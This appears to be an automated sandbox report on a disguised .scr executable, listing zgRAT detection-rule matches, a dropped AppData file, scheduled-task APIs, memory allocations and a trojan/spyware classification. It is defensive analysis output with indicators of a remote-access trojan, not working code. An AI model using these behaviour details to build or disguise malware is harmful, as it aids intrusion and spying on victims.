                    Source: 2.2.UGS - CRO REQ - KHIDUBAI (OPL-841724).scr.3e5f910.6.unpack, type: UNPACKEDPEMatched rule: Detects zgRAT Author: ditekSHen
                    Source: 2.2.UGS - CRO REQ - KHIDUBAI (OPL-841724).scr.3e1f8f0.10.raw.unpack, type: UNPACKEDPEMatched rule: Detects zgRAT Author: ditekSHen
                    Source: 2.2.UGS - CRO REQ - KHIDUBAI (OPL-841724).scr.3e5f910.6.raw.unpack, type: UNPACKEDPEMatched rule: Detects zgRAT Author: ditekSHen
                    Source: 00000002.00000002.431328729.0000000004250000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Detects zgRAT Author: ditekSHen
                    Source: C:\Users\user\Desktop\UGS - CRO REQ - KHIDUBAI (OPL-841724).scrMemory allocated: 770B0000 page execute and read and writeJump to behavior
                    Source: C:\Users\user\Desktop\UGS - CRO REQ - KHIDUBAI (OPL-841724).scrMemory allocated: 770B0000 page execute and read and writeJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Kbojz.exeMemory allocated: 770B0000 page execute and read and writeJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Kbojz.exeMemory allocated: 770B0000 page execute and read and writeJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Kbojz.exeMemory allocated: 770B0000 page execute and read and write
                    Source: C:\Users\user\AppData\Roaming\Kbojz.exeMemory allocated: 770B0000 page execute and read and write
                    Source: C:\Users\user\Desktop\UGS - CRO REQ - KHIDUBAI (OPL-841724).scrCode function: 0_2_004CE8E00_2_004CE8E0
                    Source: C:\Users\user\Desktop\UGS - CRO REQ - KHIDUBAI (OPL-841724).scrCode function: 0_2_004CE6280_2_004CE628
                    Source: C:\Users\user\Desktop\UGS - CRO REQ - KHIDUBAI (OPL-841724).scrCode function: 0_2_01EFF6B80_2_01EFF6B8
                    Source: C:\Users\user\Desktop\UGS - CRO REQ - KHIDUBAI (OPL-841724).scrCode function: 0_2_01EF47900_2_01EF4790
                    Source: C:\Users\user\Desktop\UGS - CRO REQ - KHIDUBAI (OPL-841724).scrCode function: 0_2_01F00FA80_2_01F00FA8
                    Source: C:\Users\user\Desktop\UGS - CRO REQ - KHIDUBAI (OPL-841724).scrCode function: 0_2_01F0A3300_2_01F0A330
                    Source: C:\Users\user\Desktop\UGS - CRO REQ - KHIDUBAI (OPL-841724).scrCode function: 0_2_01F0A3200_2_01F0A320
                    Source: C:\Users\user\Desktop\UGS - CRO REQ - KHIDUBAI (OPL-841724).scrCode function: 0_2_01F1B0400_2_01F1B040
                    Source: C:\Users\user\Desktop\UGS - CRO REQ - KHIDUBAI (OPL-841724).scrCode function: 0_2_01F100400_2_01F10040
                    Source: C:\Users\user\Desktop\UGS - CRO REQ - KHIDUBAI (OPL-841724).scrCode function: 0_2_01F1142C0_2_01F1142C
                    Source: C:\Users\user\Desktop\UGS - CRO REQ - KHIDUBAI (OPL-841724).scrCode function: 0_2_01F151100_2_01F15110
                    Source: C:\Users\user\Desktop\UGS - CRO REQ - KHIDUBAI (OPL-841724).scrCode function: 0_2_01F150FF0_2_01F150FF
                    Source: C:\Users\user\Desktop\UGS - CRO REQ - KHIDUBAI (OPL-841724).scrCode function: 0_2_01F140800_2_01F14080
                    Source: C:\Users\user\Desktop\UGS - CRO REQ - KHIDUBAI (OPL-841724).scrCode function: 0_2_01F140700_2_01F14070
                    Source: C:\Users\user\Desktop\UGS - CRO REQ - KHIDUBAI (OPL-841724).scrCode function: 0_2_01F100060_2_01F10006
                    Source: C:\Users\user\Desktop\UGS - CRO REQ - KHIDUBAI (OPL-841724).scrCode function: 0_2_01F19C600_2_01F19C60
                    Source: C:\Users\user\Desktop\UGS - CRO REQ - KHIDUBAI (OPL-841724).scrCode function: 0_2_01F19C500_2_01F19C50
                    Source: C:\Users\user\Desktop\UGS - CRO REQ - KHIDUBAI (OPL-841724).scrCode function: 0_2_046AB4B00_2_046AB4B0
                    Source: C:\Users\user\Desktop\UGS - CRO REQ - KHIDUBAI (OPL-841724).scrCode function: 0_2_046A81780_2_046A8178
                    Source: C:\Users\user\Desktop\UGS - CRO REQ - KHIDUBAI (OPL-841724).scrCode function: 0_2_046AC6B00_2_046AC6B0
                    Source: C:\Users\user\Desktop\UGS - CRO REQ - KHIDUBAI (OPL-841724).scrCode function: 0_2_046AB7D70_2_046AB7D7
                    Source: C:\Users\user\Desktop\UGS - CRO REQ - KHIDUBAI (OPL-841724).scrCode function: 0_2_046A00400_2_046A0040
                    Source: C:\Users\user\Desktop\UGS - CRO REQ - KHIDUBAI (OPL-841724).scrCode function: 0_2_046A00220_2_046A0022
                    Source: C:\Users\user\Desktop\UGS - CRO REQ - KHIDUBAI (OPL-841724).scrCode function: 0_2_04C800400_2_04C80040
                    Source: C:\Users\user\Desktop\UGS - CRO REQ - KHIDUBAI (OPL-841724).scrCode function: 0_2_04C800060_2_04C80006
                    Source: C:\Users\user\Desktop\UGS - CRO REQ - KHIDUBAI (OPL-841724).scrCode function: 0_2_058CD6500_2_058CD650
                    Source: C:\Users\user\Desktop\UGS - CRO REQ - KHIDUBAI (OPL-841724).scrCode function: 0_2_058B00060_2_058B0006
                    Source: C:\Users\user\Desktop\UGS - CRO REQ - KHIDUBAI (OPL-841724).scrCode function: 0_2_058B00400_2_058B0040
                    Source: C:\Users\user\Desktop\UGS - CRO REQ - KHIDUBAI (OPL-841724).scrCode function: 0_2_058CCAA80_2_058CCAA8
                    Source: C:\Users\user\Desktop\UGS - CRO REQ - KHIDUBAI (OPL-841724).scrCode function: 2_2_001E96082_2_001E9608
                    Source: C:\Users\user\Desktop\UGS - CRO REQ - KHIDUBAI (OPL-841724).scrCode function: 2_2_001E10192_2_001E1019
                    Source: C:\Users\user\Desktop\UGS - CRO REQ - KHIDUBAI (OPL-841724).scrCode function: 2_2_001E10282_2_001E1028
                    Source: C:\Users\user\Desktop\UGS - CRO REQ - KHIDUBAI (OPL-841724).scrCode function: 2_2_004F3BF82_2_004F3BF8
                    Source: C:\Users\user\Desktop\UGS - CRO REQ - KHIDUBAI (OPL-841724).scrCode function: 2_2_004F3BD72_2_004F3BD7
                    Source: C:\Users\user\Desktop\UGS - CRO REQ - KHIDUBAI (OPL-841724).scrCode function: 2_2_006045D02_2_006045D0
                    Source: C:\Users\user\Desktop\UGS - CRO REQ - KHIDUBAI (OPL-841724).scrCode function: 2_2_00607A482_2_00607A48
                    Source: C:\Users\user\Desktop\UGS - CRO REQ - KHIDUBAI (OPL-841724).scrCode function: 2_2_006056002_2_00605600
                    Source: C:\Users\user\Desktop\UGS - CRO REQ - KHIDUBAI (OPL-841724).scrCode function: 2_2_006048F72_2_006048F7
                    Source: C:\Users\user\Desktop\UGS - CRO REQ - KHIDUBAI (OPL-841724).scrCode function: 2_2_006199582_2_00619958
                    Source: C:\Users\user\Desktop\UGS - CRO REQ - KHIDUBAI (OPL-841724).scrCode function: 2_2_00614DF82_2_00614DF8
                    Source: C:\Users\user\Desktop\UGS - CRO REQ - KHIDUBAI (OPL-841724).scrCode function: 2_2_00B2D6302_2_00B2D630
                    Source: C:\Users\user\Desktop\UGS - CRO REQ - KHIDUBAI (OPL-841724).scrCode function: 2_2_04DCBF082_2_04DCBF08
                    Source: C:\Users\user\Desktop\UGS - CRO REQ - KHIDUBAI (OPL-841724).scrCode function: 2_2_04DCB2F02_2_04DCB2F0
                    Source: C:\Users\user\Desktop\UGS - CRO REQ - KHIDUBAI (OPL-841724).scrCode function: 2_2_04DCB6382_2_04DCB638
                    Source: C:\Users\user\Desktop\UGS - CRO REQ - KHIDUBAI (OPL-841724).scrCode function: 2_2_04DC37702_2_04DC3770
                    Source: C:\Users\user\Desktop\UGS - CRO REQ - KHIDUBAI (OPL-841724).scrCode function: 2_2_04DC59682_2_04DC5968
                    Source: C:\Users\user\Desktop\UGS - CRO REQ - KHIDUBAI (OPL-841724).scrCode function: 2_2_04EF5DC02_2_04EF5DC0
                    Source: C:\Users\user\Desktop\UGS - CRO REQ - KHIDUBAI (OPL-841724).scrCode function: 2_2_04EFAEC82_2_04EFAEC8
                    Source: C:\Users\user\AppData\Roaming\Kbojz.exeCode function: 3_2_005FE8E03_2_005FE8E0
                    Source: C:\Users\user\AppData\Roaming\Kbojz.exeCode function: 3_2_005FE6283_2_005FE628
                    Source: C:\Users\user\AppData\Roaming\Kbojz.exeCode function: 3_2_020F47983_2_020F4798
                    Source: C:\Users\user\AppData\Roaming\Kbojz.exeCode function: 3_2_021500403_2_02150040
                    Source: C:\Users\user\AppData\Roaming\Kbojz.exeCode function: 3_2_0215142C3_2_0215142C
                    Source: C:\Users\user\AppData\Roaming\Kbojz.exeCode function: 3_2_0215B4483_2_0215B448
                    Source: C:\Users\user\AppData\Roaming\Kbojz.exeCode function: 3_2_021500063_2_02150006
                    Source: C:\Users\user\AppData\Roaming\Kbojz.exeCode function: 3_2_0215A0583_2_0215A058
                    Source: C:\Users\user\AppData\Roaming\Kbojz.exeCode function: 3_2_0215A0683_2_0215A068
                    Source: C:\Users\user\AppData\Roaming\Kbojz.exeCode function: 3_2_021544783_2_02154478
                    Source: C:\Users\user\AppData\Roaming\Kbojz.exeCode function: 3_2_021544883_2_02154488
                    Source: C:\Users\user\AppData\Roaming\Kbojz.exeCode function: 3_2_021555183_2_02155518
                    Source: C:\Users\user\AppData\Roaming\Kbojz.exeCode function: 3_2_021555073_2_02155507
                    Source: C:\Users\user\AppData\Roaming\Kbojz.exeCode function: 3_2_021A07C03_2_021A07C0
                    Source: C:\Users\user\AppData\Roaming\Kbojz.exeCode function: 3_2_021A9B383_2_021A9B38
                    Source: C:\Users\user\AppData\Roaming\Kbojz.exeCode function: 3_2_021A9B283_2_021A9B28
                    Source: C:\Users\user\AppData\Roaming\Kbojz.exeCode function: 3_2_021A07B03_2_021A07B0
                    Source: C:\Users\user\AppData\Roaming\Kbojz.exeCode function: 3_2_021AA1243_2_021AA124
                    Source: C:\Users\user\AppData\Roaming\Kbojz.exeCode function: 3_2_04D0B4A03_2_04D0B4A0
                    Source: C:\Users\user\AppData\Roaming\Kbojz.exeCode function: 3_2_04D0EEF03_2_04D0EEF0
                    Source: C:\Users\user\AppData\Roaming\Kbojz.exeCode function: 3_2_04D0C6983_2_04D0C698
                    Source: C:\Users\user\AppData\Roaming\Kbojz.exeCode function: 3_2_04D0B7C73_2_04D0B7C7
                    Source: C:\Users\user\AppData\Roaming\Kbojz.exeCode function: 3_2_04D000403_2_04D00040
                    Source: C:\Users\user\AppData\Roaming\Kbojz.exeCode function: 3_2_04D0001F3_2_04D0001F
                    Source: C:\Users\user\AppData\Roaming\Kbojz.exeCode function: 3_2_04D081783_2_04D08178
                    Source: C:\Users\user\AppData\Roaming\Kbojz.exeCode function: 3_2_052C00403_2_052C0040
                    Source: C:\Users\user\AppData\Roaming\Kbojz.exeCode function: 3_2_05C0D2483_2_05C0D248
                    Source: C:\Users\user\AppData\Roaming\Kbojz.exeCode function: 3_2_05BF003B3_2_05BF003B
                    Source: C:\Users\user\AppData\Roaming\Kbojz.exeCode function: 3_2_05BF00403_2_05BF0040
                    Source: C:\Users\user\AppData\Roaming\Kbojz.exeCode function: 3_2_05C0C6A03_2_05C0C6A0
                    Source: C:\Users\user\AppData\Roaming\Kbojz.exeCode function: 4_2_006BE8E04_2_006BE8E0
                    Source: C:\Users\user\AppData\Roaming\Kbojz.exeCode function: 4_2_006BE6284_2_006BE628
                    Source: C:\Users\user\AppData\Roaming\Kbojz.exeCode function: 4_2_01F600484_2_01F60048
                    Source: C:\Users\user\AppData\Roaming\Kbojz.exeCode function: 4_2_01FD00404_2_01FD0040
                    Source: C:\Users\user\AppData\Roaming\Kbojz.exeCode function: 4_2_01FDB4484_2_01FDB448
                    Source: C:\Users\user\AppData\Roaming\Kbojz.exeCode function: 4_2_01FD142C4_2_01FD142C
                    Source: C:\Users\user\AppData\Roaming\Kbojz.exeCode function: 4_2_01FDA0684_2_01FDA068
                    Source: C:\Users\user\AppData\Roaming\Kbojz.exeCode function: 4_2_01FDA0584_2_01FDA058
                    Source: C:\Users\user\AppData\Roaming\Kbojz.exeCode function: 4_2_01FD00064_2_01FD0006
                    Source: C:\Users\user\AppData\Roaming\Kbojz.exeCode function: 4_2_01FD55184_2_01FD5518
                    Source: C:\Users\user\AppData\Roaming\Kbojz.exeCode function: 4_2_01FD55074_2_01FD5507
                    Source: C:\Users\user\AppData\Roaming\Kbojz.exeCode function: 4_2_01FD44884_2_01FD4488
                    Source: C:\Users\user\AppData\Roaming\Kbojz.exeCode function: 4_2_01FD44784_2_01FD4478
                    Source: C:\Users\user\AppData\Roaming\Kbojz.exeCode function: 4_2_020147984_2_02014798
                    Source: C:\Users\user\AppData\Roaming\Kbojz.exeCode function: 4_2_020307C04_2_020307C0
                    Source: C:\Users\user\AppData\Roaming\Kbojz.exeCode function: 4_2_02039B284_2_02039B28
                    Source: C:\Users\user\AppData\Roaming\Kbojz.exeCode function: 4_2_02039B384_2_02039B38
                    Source: C:\Users\user\AppData\Roaming\Kbojz.exeCode function: 4_2_020307B04_2_020307B0
                    Source: C:\Users\user\AppData\Roaming\Kbojz.exeCode function: 4_2_0203A1244_2_0203A124
                    Source: C:\Users\user\AppData\Roaming\Kbojz.exeCode function: 4_2_04E0B4A04_2_04E0B4A0
                    Source: C:\Users\user\AppData\Roaming\Kbojz.exeCode function: 4_2_04E0EF804_2_04E0EF80
                    Source: C:\Users\user\AppData\Roaming\Kbojz.exeCode function: 4_2_04E0C6984_2_04E0C698
                    Source: C:\Users\user\AppData\Roaming\Kbojz.exeCode function: 4_2_04E0B7C74_2_04E0B7C7
                    Source: C:\Users\user\AppData\Roaming\Kbojz.exeCode function: 4_2_04E000404_2_04E00040
                    Source: C:\Users\user\AppData\Roaming\Kbojz.exeCode function: 4_2_04E0001F4_2_04E0001F
                    Source: C:\Users\user\AppData\Roaming\Kbojz.exeCode function: 4_2_04E081684_2_04E08168
                    Source: C:\Users\user\AppData\Roaming\Kbojz.exeCode function: 4_2_04E081784_2_04E08178
                    Source: C:\Users\user\AppData\Roaming\Kbojz.exeCode function: 4_2_054000404_2_05400040
                    Source: C:\Users\user\AppData\Roaming\Kbojz.exeCode function: 4_2_054000274_2_05400027
                    Source: C:\Users\user\AppData\Roaming\Kbojz.exeCode function: 4_2_0721D2484_2_0721D248
                    Source: C:\Users\user\AppData\Roaming\Kbojz.exeCode function: 4_2_0721C6A04_2_0721C6A0
                    Source: C:\Users\user\AppData\Roaming\Kbojz.exeCode function: 4_2_072000074_2_07200007
                    Source: C:\Users\user\AppData\Roaming\Kbojz.exeCode function: 4_2_072000404_2_07200040
                    Source: UGS - CRO REQ - KHIDUBAI (OPL-841724).scrStatic PE information: invalid certificate
                    Source: UGS - CRO REQ - KHIDUBAI (OPL-841724).scr, 00000000.00000002.356481377.00000000023AB000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameMicrosoft.Win32.TaskScheduler.dll\ vs UGS - CRO REQ - KHIDUBAI (OPL-841724).scr
                    Source: UGS - CRO REQ - KHIDUBAI (OPL-841724).scr, 00000000.00000002.356481377.00000000023AB000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameEpqbjur.exe. vs UGS - CRO REQ - KHIDUBAI (OPL-841724).scr
                    Source: UGS - CRO REQ - KHIDUBAI (OPL-841724).scr, 00000000.00000002.359012875.0000000004190000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameprotobuf-net.dllJ vs UGS - CRO REQ - KHIDUBAI (OPL-841724).scr
                    Source: UGS - CRO REQ - KHIDUBAI (OPL-841724).scr, 00000000.00000002.356858296.00000000030F1000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameprotobuf-net.dllJ vs UGS - CRO REQ - KHIDUBAI (OPL-841724).scr
                    Source: UGS - CRO REQ - KHIDUBAI (OPL-841724).scr, 00000000.00000000.333331154.0000000000084000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenameEpqbjur.exe. vs UGS - CRO REQ - KHIDUBAI (OPL-841724).scr
                    Source: UGS - CRO REQ - KHIDUBAI (OPL-841724).scr, 00000000.00000002.356481377.00000000021F5000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameXvpwbop.exe" vs UGS - CRO REQ - KHIDUBAI (OPL-841724).scr
                    Source: UGS - CRO REQ - KHIDUBAI (OPL-841724).scr, 00000000.00000002.356481377.00000000021F5000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilename vs UGS - CRO REQ - KHIDUBAI (OPL-841724).scr
                    Source: UGS - CRO REQ - KHIDUBAI (OPL-841724).scr, 00000000.00000002.359476734.0000000007180000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameQhvpifi.dll" vs UGS - CRO REQ - KHIDUBAI (OPL-841724).scr
                    Source: UGS - CRO REQ - KHIDUBAI (OPL-841724).scr, 00000000.00000002.359148679.00000000051B0000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameMicrosoft.Win32.TaskScheduler.dll\ vs UGS - CRO REQ - KHIDUBAI (OPL-841724).scr
                    Source: UGS - CRO REQ - KHIDUBAI (OPL-841724).scr, 00000000.00000002.356481377.000000000241E000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameprotobuf-net.dllJ vs UGS - CRO REQ - KHIDUBAI (OPL-841724).scr
                    Source: UGS - CRO REQ - KHIDUBAI (OPL-841724).scr, 00000000.00000002.359319298.0000000005D54000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameEpqbjur.exe. vs UGS - CRO REQ - KHIDUBAI (OPL-841724).scr
                    Source: UGS - CRO REQ - KHIDUBAI (OPL-841724).scr, 00000000.00000002.356858296.0000000003259000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameMicrosoft.Win32.TaskScheduler.dll\ vs UGS - CRO REQ - KHIDUBAI (OPL-841724).scr
                    Source: UGS - CRO REQ - KHIDUBAI (OPL-841724).scr, 00000000.00000002.356276020.0000000000784000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameclr.dllT vs UGS - CRO REQ - KHIDUBAI (OPL-841724).scr
                    Source: UGS - CRO REQ - KHIDUBAI (OPL-841724).scr, 00000000.00000002.356481377.0000000002436000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameprotobuf-net.dllJ vs UGS - CRO REQ - KHIDUBAI (OPL-841724).scr
                    Source: UGS - CRO REQ - KHIDUBAI (OPL-841724).scr, 00000002.00000002.431328729.0000000004250000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameClassLibrary1.dll" vs UGS - CRO REQ - KHIDUBAI (OPL-841724).scr
                    Source: UGS - CRO REQ - KHIDUBAI (OPL-841724).scr, 00000002.00000002.424766179.0000000003925000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameDglpobuyba.dll" vs UGS - CRO REQ - KHIDUBAI (OPL-841724).scr
                    Source: UGS - CRO REQ - KHIDUBAI (OPL-841724).scr, 00000002.00000002.424766179.0000000003925000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameprotobuf-net.dllJ vs UGS - CRO REQ - KHIDUBAI (OPL-841724).scr
                    Source: UGS - CRO REQ - KHIDUBAI (OPL-841724).scr, 00000002.00000002.424766179.0000000003EDF000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameClassLibrary1.dll" vs UGS - CRO REQ - KHIDUBAI (OPL-841724).scr
                    Source: UGS - CRO REQ - KHIDUBAI (OPL-841724).scr, 00000002.00000002.420150231.0000000000864000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameclr.dllT vs UGS - CRO REQ - KHIDUBAI (OPL-841724).scr
                    Source: UGS - CRO REQ - KHIDUBAI (OPL-841724).scr, 00000002.00000002.424766179.0000000003C53000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameClassLibrary1.dll" vs UGS - CRO REQ - KHIDUBAI (OPL-841724).scr
                    Source: UGS - CRO REQ - KHIDUBAI (OPL-841724).scr, 00000002.00000002.434522188.0000000006180000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameDotNetZip.dll@ vs UGS - CRO REQ - KHIDUBAI (OPL-841724).scr
                    Source: UGS - CRO REQ - KHIDUBAI (OPL-841724).scr, 00000002.00000002.424766179.0000000003BE0000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameprotobuf-net.dllJ vs UGS - CRO REQ - KHIDUBAI (OPL-841724).scr
                    Source: UGS - CRO REQ - KHIDUBAI (OPL-841724).scr, 00000002.00000002.420675930.0000000002251000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilename vs UGS - CRO REQ - KHIDUBAI (OPL-841724).scr
                    Source: UGS - CRO REQ - KHIDUBAI (OPL-841724).scr, 00000002.00000002.424766179.0000000003830000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameDglpobuyba.dll" vs UGS - CRO REQ - KHIDUBAI (OPL-841724).scr
                    Source: UGS - CRO REQ - KHIDUBAI (OPL-841724).scr, 00000002.00000002.431703132.00000000046B0000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameDglpobuyba.dll" vs UGS - CRO REQ - KHIDUBAI (OPL-841724).scr
                    Source: UGS - CRO REQ - KHIDUBAI (OPL-841724).scr, 00000002.00000002.418995567.00000000004D4000.00000040.00000400.00020000.00000000.sdmpBinary or memory string: OriginalFilenameXvpwbop.exe" vs UGS - CRO REQ - KHIDUBAI (OPL-841724).scr
                    Source: UGS - CRO REQ - KHIDUBAI (OPL-841724).scrBinary or memory string: OriginalFilenameEpqbjur.exe. vs UGS - CRO REQ - KHIDUBAI (OPL-841724).scr
                    Source: UGS - CRO REQ - KHIDUBAI (OPL-841724).scrStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                    Source: 2.2.UGS - CRO REQ - KHIDUBAI (OPL-841724).scr.4250000.11.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_zgRAT author = ditekSHen, description = Detects zgRAT
                    Source: 2.2.UGS - CRO REQ - KHIDUBAI (OPL-841724).scr.3edf930.9.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_zgRAT author = ditekSHen, description = Detects zgRAT
                    Source: 2.2.UGS - CRO REQ - KHIDUBAI (OPL-841724).scr.3dff8d0.3.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_zgRAT author = ditekSHen, description = Detects zgRAT
                    Source: 2.2.UGS - CRO REQ - KHIDUBAI (OPL-841724).scr.3edf930.9.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_zgRAT author = ditekSHen, description = Detects zgRAT
                    Source: 2.2.UGS - CRO REQ - KHIDUBAI (OPL-841724).scr.4250000.11.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_zgRAT author = ditekSHen, description = Detects zgRAT
                    Source: 2.2.UGS - CRO REQ - KHIDUBAI (OPL-841724).scr.3e5f910.6.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_zgRAT author = ditekSHen, description = Detects zgRAT
                    Source: 2.2.UGS - CRO REQ - KHIDUBAI (OPL-841724).scr.3e1f8f0.10.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_zgRAT author = ditekSHen, description = Detects zgRAT
                    Source: 2.2.UGS - CRO REQ - KHIDUBAI (OPL-841724).scr.3e5f910.6.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_zgRAT author = ditekSHen, description = Detects zgRAT
                    Source: 00000002.00000002.431328729.0000000004250000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_zgRAT author = ditekSHen, description = Detects zgRAT
                    Source: 0.2.UGS - CRO REQ - KHIDUBAI (OPL-841724).scr.32afd50.5.raw.unpack, ITaskFolder.csTask registration methods: 'RegisterTaskDefinition', 'RegisterTask'
                    Source: 0.2.UGS - CRO REQ - KHIDUBAI (OPL-841724).scr.32afd50.5.raw.unpack, TaskFolder.csTask registration methods: 'RegisterTaskDefinition', 'RegisterTask', 'CreateFolder'
                    Source: 0.2.UGS - CRO REQ - KHIDUBAI (OPL-841724).scr.32afd50.5.raw.unpack, Task.csTask registration methods: 'RegisterChanges', 'CreateTask'
                    Source: 0.2.UGS - CRO REQ - KHIDUBAI (OPL-841724).scr.32afd50.5.raw.unpack, TaskService.csTask registration methods: 'CreateFromToken'
                    Source: 0.2.UGS - CRO REQ - KHIDUBAI (OPL-841724).scr.51b0000.10.raw.unpack, ITaskFolder.csTask registration methods: 'RegisterTaskDefinition', 'RegisterTask'
                    Source: 0.2.UGS - CRO REQ - KHIDUBAI (OPL-841724).scr.51b0000.10.raw.unpack, TaskFolder.csTask registration methods: 'RegisterTaskDefinition', 'RegisterTask', 'CreateFolder'
                    Source: 0.2.UGS - CRO REQ - KHIDUBAI (OPL-841724).scr.51b0000.10.raw.unpack, Task.csSecurity API names: Microsoft.Win32.TaskScheduler.Task.GetAccessControl(System.Security.AccessControl.AccessControlSections)
                    Source: 0.2.UGS - CRO REQ - KHIDUBAI (OPL-841724).scr.32afd50.5.raw.unpack, TaskFolder.csSecurity API names: Microsoft.Win32.TaskScheduler.TaskFolder.GetAccessControl(System.Security.AccessControl.AccessControlSections)
                    Source: 0.2.UGS - CRO REQ - KHIDUBAI (OPL-841724).scr.32afd50.5.raw.unpack, TaskSecurity.csSecurity API names: Microsoft.Win32.TaskScheduler.TaskSecurity.GetAccessControlSectionsFromChanges()
                    Source: 0.2.UGS - CRO REQ - KHIDUBAI (OPL-841724).scr.32afd50.5.raw.unpack, TaskSecurity.csSecurity API names: System.Security.AccessControl.CommonObjectSecurity.AddAccessRule(System.Security.AccessControl.AccessRule)
                    Source: 0.2.UGS - CRO REQ - KHIDUBAI (OPL-841724).scr.32afd50.5.raw.unpack, User.csSecurity API names: System.Security.Principal.SecurityIdentifier.Translate(System.Type)
                    Source: 0.2.UGS - CRO REQ - KHIDUBAI (OPL-841724).scr.32afd50.5.raw.unpack, TaskPrincipal.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                    Source: 0.2.UGS - CRO REQ - KHIDUBAI (OPL-841724).scr.51b0000.10.raw.unpack, User.csSecurity API names: System.Security.Principal.SecurityIdentifier.Translate(System.Type)
                    Source: 0.2.UGS - CRO REQ - KHIDUBAI (OPL-841724).scr.32afd50.5.raw.unpack, Task.csSecurity API names: Microsoft.Win32.TaskScheduler.Task.GetAccessControl(System.Security.AccessControl.AccessControlSections)
                    Source: 0.2.UGS - CRO REQ - KHIDUBAI (OPL-841724).scr.51b0000.10.raw.unpack, TaskFolder.csSecurity API names: Microsoft.Win32.TaskScheduler.TaskFolder.GetAccessControl(System.Security.AccessControl.AccessControlSections)
                    Source: 0.2.UGS - CRO REQ - KHIDUBAI (OPL-841724).scr.51b0000.10.raw.unpack, TaskSecurity.csSecurity API names: Microsoft.Win32.TaskScheduler.TaskSecurity.GetAccessControlSectionsFromChanges()
                    Source: 0.2.UGS - CRO REQ - KHIDUBAI (OPL-841724).scr.51b0000.10.raw.unpack, TaskSecurity.csSecurity API names: System.Security.AccessControl.CommonObjectSecurity.AddAccessRule(System.Security.AccessControl.AccessRule)
                    Source: 0.2.UGS - CRO REQ - KHIDUBAI (OPL-841724).scr.51b0000.10.raw.unpack, TaskPrincipal.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                    Source: classification engineClassification label: mal100.troj.spyw.evad.winSCR@9/24@61/3
                    Source: C:\Users\user\Desktop\UGS - CRO REQ - KHIDUBAI (OPL-841724).scrFile created: C:\Users\user\AppData\Roaming\Kbojz.exeJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Kbojz.exeMutant created: NULL
                    Source: C:\Users\user\Desktop\UGS - CRO REQ - KHIDUBAI (OPL-841724).scrMutant created: \Sessions\1\BaseNamedObjects\f6f8b153ecbd01c8
                    Source: C:\Users\user\Desktop\UGS - CRO REQ - KHIDUBAI (OPL-841724).scrFile created: C:\Users\user\AppData\Local\Temp\Buyeg.tmpdbJump to behavior
                    Source: UGS - CRO REQ - KHIDUBAI (OPL-841724).scrStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                    Source: UGS - CRO REQ - KHIDUBAI (OPL-841724).scrStatic file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 50.01%
                    Source: C:\Users\user\Desktop\UGS - CRO REQ - KHIDUBAI (OPL-841724).scrWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                    Source: C:\Users\user\Desktop\UGS - CRO REQ - KHIDUBAI (OPL-841724).scrWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                    Source: C:\Users\user\Desktop\UGS - CRO REQ - KHIDUBAI (OPL-841724).scrWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                    Source: C:\Users\user\AppData\Roaming\Kbojz.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                    Source: C:\Users\user\AppData\Roaming\Kbojz.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                    Source: C:\Users\user\AppData\Roaming\Kbojz.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                    Source: C:\Users\user\Desktop\UGS - CRO REQ - KHIDUBAI (OPL-841724).scrKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
